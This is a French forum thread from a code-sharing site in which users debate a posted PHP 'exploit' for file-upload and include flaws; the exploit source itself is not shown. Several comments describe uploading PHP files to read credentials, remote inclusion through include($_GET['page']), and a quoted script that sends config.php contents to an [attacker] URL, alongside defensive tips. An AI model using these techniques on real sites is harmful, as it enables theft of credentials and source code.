EXPLOI FAILLE INCLUDE & UPLOAD

Messages postés
408
Date d'inscription
lundi 16 décembre 2002
Statut
Membre
Dernière intervention
18 décembre 2012
- - Dernière réponse : Shinikaka
Messages postés
4
Date d'inscription
dimanche 3 juin 2007
Statut
Membre
Dernière intervention
2 février 2012
- 2 déc. 2010 à 14:08
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/22045-exploi-faille-include-upload

Afficher la suite 
cs_zzzzzz
Messages postés
408
Date d'inscription
lundi 16 décembre 2002
Statut
Membre
Dernière intervention
18 décembre 2012
-
Qui a mit 1/10 ? n'importe quoi c'est pas prk c marqué exploit qu'il faut marquer directement 1/10. moi je te remercie pour ta source et je met 10/10 por compenser, @+
OverDarck
Messages postés
116
Date d'inscription
jeudi 12 juillet 2001
Statut
Membre
Dernière intervention
23 juin 2005
-
Tout simplement exelent, d'une simplicitée certaine, mais d'une puissance extraordinaire !!!!
Merci bien !
cs_ceced
Messages postés
70
Date d'inscription
lundi 12 mai 2003
Statut
Membre
Dernière intervention
11 mai 2005
-
merci bien, lol, mais le but qd meme et pour dir la securité avant tout!
et tempis pour se qu'ils ont cette faille et qu'il ne la securise pas! faute du webmaster et non de la faille...
cs_zzzzzz
Messages postés
408
Date d'inscription
lundi 16 décembre 2002
Statut
Membre
Dernière intervention
18 décembre 2012
-
Par contre tu pourrai détailler le principe de l'exploit car je n'ai pas comprit le principe (:p) merci.
cs_ceced
Messages postés
70
Date d'inscription
lundi 12 mai 2003
Statut
Membre
Dernière intervention
11 mai 2005
-
Le principe est simple, cela marche seulement coté serveur, et comme tous le monde sais, il faut, réussir, a uploader se fichier, pour recuperer les login et passe grace a ce script ...(cela peut etre sql, lhost, ftp, ect..) Donc en gros, si le webmaster n'a pas securisé l'upload de fichier en surveillant les extentions, .php, ou autre, risque et perile pour lui!

Donc si tu sais ou le fichier de la source que j ai mi se trouve, il te fau tous simplement, executé le script, cad: http://www.victime.com/photos/code.php

enfait on s'est tous que les pages, config.inc.php ou autre dont la majorité utilise le nom de c page, dedans se trouve les connexions, cad, host, pass, login d'autre par tu sais que tu ne peu pas executé se script comme http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

ca ne marchera pas et si ca marcherai il n'y aurai plus du php :p...!

J'ai essayé pour wanadoo car wanadoo a une faille enorme fo l'exploité, je ne la donnerai pas ici...

VOILA le but de se script et de lire toute les source extention php dans tous les rep/

de plus il t enregistre sous le nom code.own donc t source des pages recupéré par le script tu peux soi les telecharger, soi les voir directement via l 'url (voir lien show source) possibilité d affiché les code en couleur

Voir aussi fonction showsource("page") si tu veu t amusé...

Voilou..
cs_koko
Messages postés
654
Date d'inscription
lundi 14 janvier 2002
Statut
Membre
Dernière intervention
20 février 2005
-
http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

il y a moyen tout de meme ^^

mais je dirais pas comment
cs_Kirua
Messages postés
3006
Date d'inscription
dimanche 14 avril 2002
Statut
Membre
Dernière intervention
31 décembre 2008
-
bah Koko, y a pas moyen si le webmaster prend ses dispositions, voilà tout. C'est comme ça pour tous les points sensibles :-)
cs_koko
Messages postés
654
Date d'inscription
lundi 14 janvier 2002
Statut
Membre
Dernière intervention
20 février 2005
-
mais alors l'utilité de cette source si le webmaster prend ses dispositions ?

c'était juste que je disais qu'il y avait comme meme moyen de le faire :)
-=|[titiplusplus]|=-
Messages postés
28
Date d'inscription
vendredi 7 novembre 2003
Statut
Membre
Dernière intervention
19 avril 2004
-
oui mais en général sur chez un hébergeur, on a seulement accès son répertoire et non celui des autres ... le seule moyen d'utiliser ce script reste de trouver un site qui authorise l'upload sauvage ... hihi.
Et ce qui serait intéressant c'est de rechercher la racine du site :
<?
ex :
$dir='.';
while (is_dir($dir))
{
$dir.='../';
}
?>

Ou un truc dans le genre ...
-=|[titiplusplus]|=-
Messages postés
28
Date d'inscription
vendredi 7 novembre 2003
Statut
Membre
Dernière intervention
19 avril 2004
-
hé koko je viens de réaliser un truc la ...

http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

Là le résultat sera uniquement au mieux du html !!!

Tu ne peux pas avoir la source d'un php distant comme ca !
A moins de configurer tonsite.com comme il faut pour le faire !!!

Et ca c'est plutot utopique, non ?
cs_ceced
Messages postés
70
Date d'inscription
lundi 12 mai 2003
Statut
Membre
Dernière intervention
11 mai 2005
-
http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

1. KOKO SI TU ARRIVE TU AS DETRUIT PHP,
2.http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php a la limite tu peu fair un script java script pour recuperation ou volé les cookies c'est tous! mais pas executé un script coté distant !
Samiby
Messages postés
118
Date d'inscription
mercredi 26 novembre 2003
Statut
Membre
Dernière intervention
2 janvier 2006
-
de tout de façon, qui n'a pas le code d'accès au FTP, n'as le droit de lire les fichiers. Il ne peut les lire qu'au travers du navigateur, sous forme de HTML. il me semble que les fichiers sont protégés contre la lecture non autorisée chez tous les hébergeurs.
cs_ceced
Messages postés
70
Date d'inscription
lundi 12 mai 2003
Statut
Membre
Dernière intervention
11 mai 2005
-
Mais evidement sinon php serai interdit!
Samiby
Messages postés
118
Date d'inscription
mercredi 26 novembre 2003
Statut
Membre
Dernière intervention
2 janvier 2006
-
Maids donc, où est la faille ? Tu ne peux rien obtenir par ce code, si ce n'est ce que tu as en faisant 'afficher la source' dans ton navigateur.
cs_ceced
Messages postés
70
Date d'inscription
lundi 12 mai 2003
Statut
Membre
Dernière intervention
11 mai 2005
-
la faille et a l'upload garcon! (include), peut etre que tu trouvera le fichier, cofing.inc.php, mais tu pouras pas le lire, et si t arrive a uploadé mon fichier, t'obitendra les codes, (si y a pas d'otre faille), mais c'est une faille que bcp utilise surement! croi moi lol c belle et bien une faille!


bin si non dit moi comment tu recupere un code sans une source de cette maniere...

Y A PLusieur faille comme script kiddi, ect... mais celle ci ne fait pas parti d'un script kiddi :) (comme on l appelle)
cs_ceced
Messages postés
70
Date d'inscription
lundi 12 mai 2003
Statut
Membre
Dernière intervention
11 mai 2005
-
tu peu obtenire les sources php sachant que php est invisible en affichant la source!

qd tu affiches la source dans un navigateur tu lis que l'html, rien d'autre!

relie la doc php :) (baseeeee)
-=|[titiplusplus]|=-
Messages postés
28
Date d'inscription
vendredi 7 novembre 2003
Statut
Membre
Dernière intervention
19 avril 2004
-
Après ma petite enquête ... tout le monde à raison.
Et donc, koko aussi !!!
Juste que koko a oublié de préciser que le fichier malveillant doit être visualisé par l'admin du site en local !
En plus pour écrire ce script il doit avoir le full patch du fichier dont il veut la source :-P

Voici l'extrait de http://www.phpsecure.info/v2/article/Phpinfo-Security.php :

Si on a le path complet et que le webmaster visite une page contenant ce script :
---------------------------------------------------------------------------
<script>
dafile=window.open('/home/httpd/public_html/config.php');
window.open('http://[attacker]/file.php?'+dafile.document.body.innerText);
</script>
---------------------------------------------------------------------------
depuis l'ordinateur dans lequel se trouve le site, il renverra la source du fichier config.php au fichier
http://[attacker]/file.php, qui enregistrera l'information d'une façon ou d'une autre.


Voilou ;-)
-=|[titiplusplus]|=-
Messages postés
28
Date d'inscription
vendredi 7 novembre 2003
Statut
Membre
Dernière intervention
19 avril 2004
-
Le full patch que j'écris ... loOl ... mdr ... non excusez-moi ... hihi ... c pas le "full patch" mais le "fullpath".
apxa
Messages postés
188
Date d'inscription
mercredi 15 mai 2002
Statut
Membre
Dernière intervention
25 avril 2009
-
salut,
c pas une faille mais je dirais plutot un mauvais parametrage de php.ini.
il suffit de mettre php en mode safe et le tour est joue.
sans compté que php.ini permet le refus de certaine commandes dites "sensibles" telque system() ou readfile().
ceci dit comme d'hab la majorité des hacking est souvent du a une mauvaise administration du site, de même pour un developpement.
Have Fun
cs_koko
Messages postés
654
Date d'inscription
lundi 14 janvier 2002
Statut
Membre
Dernière intervention
20 février 2005
-
alors je vais expliquer (pas la faille mais bon)

il y a un site qui n'est pas a moi (on va dire phpcs pour que vous compreniez mais il n'y a pas cette faille)

si je fais :
http://www.phpcs.com/include.php?page=http://monsite/script.php

et que dans include.php il y ai : include($_GET['page']);

la page script.php sera exécutée comme du php !!!

MAIS ca ne marchera pas a la base si vous utilisez un serveur apache par exemple.
Car le php est interpreté coté serveur
donc la page sera exécutée sur monsite !!
MAIS BIS il y a moyen que le code soit exécuter sur le serveur phpcs !!!

et c'est tres facile a le faire (je l'ai déjà fait !) mais je dis pas comment, je veux pas que des gamins s'amusent avec ca...
Samiby
Messages postés
118
Date d'inscription
mercredi 26 novembre 2003
Statut
Membre
Dernière intervention
2 janvier 2006
-
Il y a déjà eu des imbéciles qui ne surveillent pas l'upload sur leur site ?
Il faut être vraiment débile.
C'est sûr que à partir du moment où tu peux uploader n'importe quel fichier chez quelqu'un, tu peux faire n'importe quoi.
cs_Kirua
Messages postés
3006
Date d'inscription
dimanche 14 avril 2002
Statut
Membre
Dernière intervention
31 décembre 2008
-
ce n'est pas une faille, c'est une imprudence. les créateurs de PHP ne sont pas raisonnable de la connerie des gens. qd tu laisses au visiteur la possibilité de placer ses fichiers personnels sur ton serveur FTP, tu prends tes dispositions, basta. je trouve qu'on ne peut pas appeler ça une faille.
-=|[titiplusplus]|=-
Messages postés
28
Date d'inscription
vendredi 7 novembre 2003
Statut
Membre
Dernière intervention
19 avril 2004
-
hihi ... mdr

>et c'est tres facile a le faire (je l'ai déjà fait !) mais je dis pas comment ...

J'adore cette phrase !
Hihihi ...
Hé bien moi je te donne un défis alors !
Pour prouver ta bonne fois je t'authorise à me donner le contenu de mon index.php de mon site loOl.

Voici l'adresse : http://ebc.titiplusplus.com/index.php

Aller sans rancune ;-)
cs_koko
Messages postés
654
Date d'inscription
lundi 14 janvier 2002
Statut
Membre
Dernière intervention
20 février 2005
-
faut une faille de type include !
et j'ai pas envie de chercher des failles include sur php nuke...
-=|[titiplusplus]|=-
Messages postés
28
Date d'inscription
vendredi 7 novembre 2003
Statut
Membre
Dernière intervention
19 avril 2004
-
En tout cas mon truc plus haut marche !

C'est du XSS ( Cross Site Scripting pour ceux qui ne connaissent pas).

Le plus dur est de faire doublecliquer l'admin dessus ... hehe ...

@+
Samiby
Messages postés
118
Date d'inscription
mercredi 26 novembre 2003
Statut
Membre
Dernière intervention
2 janvier 2006
-
Ca marche, mais il faut avoir vu le phpinfo() du site, ce qui n'est pas donné à tout le monde
testetrtr
Messages postés
20
Date d'inscription
mercredi 14 mai 2003
Statut
Membre
Dernière intervention
5 juin 2006
-
deoler les gas mes cette source n'est pas vraimment ce que je vais califier de exelent .
pour ma note sa cera 3 a 4 sur 10.

pour quoi parceque c'est facile de dree une source plus complette que celle la qui donne l'oportuniter d'uploader sur le serveur que vous avec penetrer . et aussi d'executer des commandes shell et des php.

ce pandant c'est un script qui est lier au pirage , c'est pour ca que je vais vous metre qu'une capture d'ecrant de mon script.

( je l'ai tester sur mon serveur,).

http://lux0r.projektas.lt/do_upload.php
psyjc
Messages postés
182
Date d'inscription
dimanche 29 juin 2003
Statut
Membre
Dernière intervention
18 avril 2008
-
daccord avec testetrtr, la source est bof bof!
mais ton script d'upload aussi ;)
tu devrais revoir la securité de ton upload...
testetrtr
Messages postés
20
Date d'inscription
mercredi 14 mai 2003
Statut
Membre
Dernière intervention
5 juin 2006
-
desolais mais le script d'upload n'est pas de moi.

je l'utilise juste pour dennee des exemple comme ici , c'est tous.

si nan explique ton idee de securite de se script.

c'est tj interessant a savoire.
psyjc
Messages postés
182
Date d'inscription
dimanche 29 juin 2003
Statut
Membre
Dernière intervention
18 avril 2008
-
bah va voir sur ton site :)
dans les derniers uploads : testX.php.jpg
execution de code js au travers dimages (sur IE)
tu devrais verifier le type mime en plus de l'extension de fichier avant d'accepter l'upload d'une image.
testetrtr
Messages postés
20
Date d'inscription
mercredi 14 mai 2003
Statut
Membre
Dernière intervention
5 juin 2006
-
ok j'ai trouver le prob de la securiter de ce script.
je vais le dire a son proprio.
pour qu'il corrige son script.

pour psyjc (y a quoi comme astuce pour tester la securiter d'un code php , )? astuce comme celle que t'a tester sur ce script.

tu peux me repondre par mail si tu veux.
apxa
Messages postés
188
Date d'inscription
mercredi 15 mai 2002
Statut
Membre
Dernière intervention
25 avril 2009
-
Re salut,
je vais peut etre me repeter mais je pense que si tu veux palier ce genre de faille ,il y a plusieurs solutions :
- soit tu passes par un htaccess avec des controles sur l'host appelant le fichier. (apach only)
- soit tu met php en mode safe on avec des refus d'execution de commandes sensibles (apache ou iis)
- soit tu parses via php le path du fichier afin de recuperer l'host et ainsi comparer avec l'host du serveur pour s'assurer que le fichier executer se trouve bien sur le serveur et non un serveur distant.
- soit tu fais ton site en html et tu fais pas chié le monde avec des failles de newbee (amicalement) ;)
Have Fun.
pgpp
Messages postés
58
Date d'inscription
dimanche 16 mai 2004
Statut
Membre
Dernière intervention
2 septembre 2004
-
salut!
Juste pour dire que je suis d'accord avec koko, il existe une solution plus que simple pour faire exécuter du php via une faille include.
Alors protégez vous bien comme le dit apxa !
cs_coeur_enf
Messages postés
1
Date d'inscription
samedi 5 juin 2004
Statut
Membre
Dernière intervention
6 juin 2004
-
tu va t'atker a des noob, ki essai d'aprendre le php, et ki on pe de finance

moi je te le dis, atk toi a un mome de 5 an dans la rue, c'est la meme chose !!!!

je rigole kan je vois des bouffon come ca !!!!

je pense ke si vou aviez + de cervel, vou ferriez une explication pour ke les noob sache ce proteger !!!

la je dirai bravo !
cs_Kirua
Messages postés
3006
Date d'inscription
dimanche 14 avril 2002
Statut
Membre
Dernière intervention
31 décembre 2008
-
ça fait 24h que t'es inscrit sur le site et t'es déjà agressif, éh béh...

ceci dit, suis assez d'accord avec toi sur le fait que ce code porte bien mal ce nom, mais vraiment pas d'accord avec le fait que tu prennes à parti toute la click qui a commenté ici en ayant manifestement pas lu les commentaires.
psyjc
Messages postés
182
Date d'inscription
dimanche 29 juin 2003
Statut
Membre
Dernière intervention
18 avril 2008
-
il y a une (petite) charte juste là, qui dit je cite : "Merci également de veiller à ne pas trop écorcher la langue de molière en écrivant en abrégé (comme sur des SMS)."

alors commence par lire ca, et puis tant que t'y est, tu peux aussi lire les commentaires au dessus avant de dire de la merde...
cs_ceced
Messages postés
70
Date d'inscription
lundi 12 mai 2003
Statut
Membre
Dernière intervention
11 mai 2005
-
coeur_enf j'ai envie de te dire juste vie ta vie, et bosse pour ta geule!
no comment!
-=|[titiplusplus]|=-
Messages postés
28
Date d'inscription
vendredi 7 novembre 2003
Statut
Membre
Dernière intervention
19 avril 2004
-
loOl ... et apres ?

Pour moi ca incite en rien du tout ce code, mdr.

Tu voulais nous faire partager ta découverte du whois ?

hihihi
psyjc
Messages postés
182
Date d'inscription
dimanche 29 juin 2003
Statut
Membre
Dernière intervention
18 avril 2008
-
Mdrrr!
en attendant tu n'a pas du lire ce que j'ai ecrit plus haut..

bref. j'arrette de perdre du temps sur ce fil..
cs_Kirua
Messages postés
3006
Date d'inscription
dimanche 14 avril 2002
Statut
Membre
Dernière intervention
31 décembre 2008
-
extrait du texte de présentation de ce code (que tu n'as pas lu):

Explication finale :
---------------------------------------
La securité avant tout!

alors quoi?
skotmarud
Messages postés
119
Date d'inscription
samedi 5 avril 2003
Statut
Membre
Dernière intervention
26 janvier 2008
-
.txt :X
cs_stal
Messages postés
2
Date d'inscription
lundi 30 août 2004
Statut
Membre
Dernière intervention
9 septembre 2004
-
tu n'as pas un lien de telechargement ?
renaud288
Messages postés
8
Date d'inscription
jeudi 26 février 2004
Statut
Membre
Dernière intervention
13 décembre 2004
-
Petit commentaire rapide. La faille est connue depuis longtemps.... c'est pas une faille PHP...
T'aurais pu être simpa avec les internautes en donnant des données pour résoudre le pb:
1- le problème est à l'upload de fichier via HTML (postage de fichier).
2- Sécuriser la récupération: test de l'extention... (selon le type de serveur (n'oubliez pas les extentions asp etc si votre serveur interprète plusieurs langauges...)
3- parsage du fichier uploadé: contient il du code php, asp etc...
4- ne pas oublier d'ajouter la fonction addslashes a vos données post ou get (il est possible du mettre du code PHP dedans... avec les b ons guillements, les OR et les fonctions php.
5- ne pas déplacer le fichier du rep tmp avant d'être sur
6- effacer le fichier du dossier tmp
7- si votre hébergeur le permet: ne pas mettre le fichier tmp ou équivalent dans la racine... (si les codes du hacker sont bien faits, il peut exécuter le fichier avant qu'il ne soit supprimé de disque
8- Penser aussi à parser d'autres extentions... attention virus, programme de prise de contrôle sur le serveur etc...
Bonne prog à tous et merci aux programmeurs qui mettent en évidence les failles (ou du moins les expliquent aux débutants)
kankrelune
Messages postés
1305
Date d'inscription
mardi 9 novembre 2004
Statut
Membre
Dernière intervention
21 mai 2015
-
hé coeur_enf(flammé ça doit etre pour ça... :oD)... .. .

Tu fais comment pour combler une faille de sécurité si t'en entend pas parler... anaha ??? .. . :oP

Et en attendant si tu sais lire la moitié des posteurs on parlés de failles de sécu exploitable sans en donner la façon de l'exploiter... .. .

Et faire un whois de phpcs... mais ça t'avance à quoi... t'a quel age... .. ?

O_o

Il n'y a rien d'illégale dans cette page... va sur les sites de microsoft, de phpnuke, etc... les failles y sont déclarées publiquement dès qu'elles sont trouvées... et heureusement... ça permet de prendre les mesures adéquates pour les combler... .. .

Allez avoue coeur_enf ça t'ennerve parce que tu as peut etre la faille et que personne ici ne donne de code tout fait pour la combler... Alors arrete de pousser mémé dans les orties... .. . ;o)

Pour le reste je serais interessé si quelqu'un à un lien interessant à me conseiller sur la sécurisation du php et sur les points 2, 3 et 4 que vient d'évoquer renaud288... de préference en français si c'est pô trop demander... bien que le site auquel je pense ne présente guere de faille de se genre (le visiteur peut juste lire... pas d'upload, pas de forum et pas encore de guestbook... peut toujours s'accrocher... :oD) ça pourra m'être quand même utile et etre utile à du monde... .. .

^_^

@ tchaOo°
alex1025
Messages postés
104
Date d'inscription
mardi 17 février 2004
Statut
Membre
Dernière intervention
8 décembre 2007
-
si on met un htacces dans le rep ou arrive l image il n'y a plus de soucis non?
cs_guismo1er
Messages postés
76
Date d'inscription
vendredi 21 mars 2003
Statut
Membre
Dernière intervention
12 mars 2009
-
Vraiment pas mal cette source, ce serait gentil de nous donner des astuces pour protéger des fichiers lors de l'upload, car ca m'interessrerai bcp :)

Merci à vous :)
cs_guismo1er
Messages postés
76
Date d'inscription
vendredi 21 mars 2003
Statut
Membre
Dernière intervention
12 mars 2009
-
avez vous des idées?
NKWolf
Messages postés
39
Date d'inscription
samedi 28 août 2004
Statut
Membre
Dernière intervention
11 janvier 2007
-
bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code

sinon GG ;)
NKWolf
Messages postés
39
Date d'inscription
samedi 28 août 2004
Statut
Membre
Dernière intervention
11 janvier 2007
-
bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code

sinon GG ;)
Steph448
Messages postés
1
Date d'inscription
samedi 8 août 2009
Statut
Membre
Dernière intervention
8 août 2009
-
xD je ne mis connais pas super bien en ordi, vous pouvez l'expliquer en français san le langage ordi?
Shinikaka
Messages postés
4
Date d'inscription
dimanche 3 juin 2007
Statut
Membre
Dernière intervention
2 février 2012
-
Pour ceux qui ont suivis le sujet de discussion ...
Même si tu n'autorise que des fichier .jpg, ou .png, bref des images, il y a des façons de contourner cette protection.

Les vrais complèterons la suite : nu**b**e ... le truc avec un % :) voyez ?
Je ne voudrais pas être plus explicite.
Si vous savez de quoi je parle, vous n'avez rien a faire ici et connaissez ces méthodes de contournement.
Si vous ne savez pas de quoi je parle, ce script pourrait ne jamais vous être utile, donc vous n'avez rien a faire ici non plus :)
Shinikaka
Messages postés
4
Date d'inscription
dimanche 3 juin 2007
Statut
Membre
Dernière intervention
2 février 2012
-
Solution la plus efficace pour vous protéger (upload de fichier je parle)
Comme l'a dit renaud288 en 2004 :
- addslashes dans les post et get
- parser le contenu du fichier (pas obligatoire...) pour y trouver un code php

L'ultime solution :
- Renommer le fichier recu en quelque chose . extension obligatoire
exemple :
j'upload script.php
La page qui analyse et traite l'upload le renomme en asdj012.png
TOUJOURS RENOMMER PAR L'EXTENSSION DESIREE ! et voila vous êtes protégé... mais jamais a 100%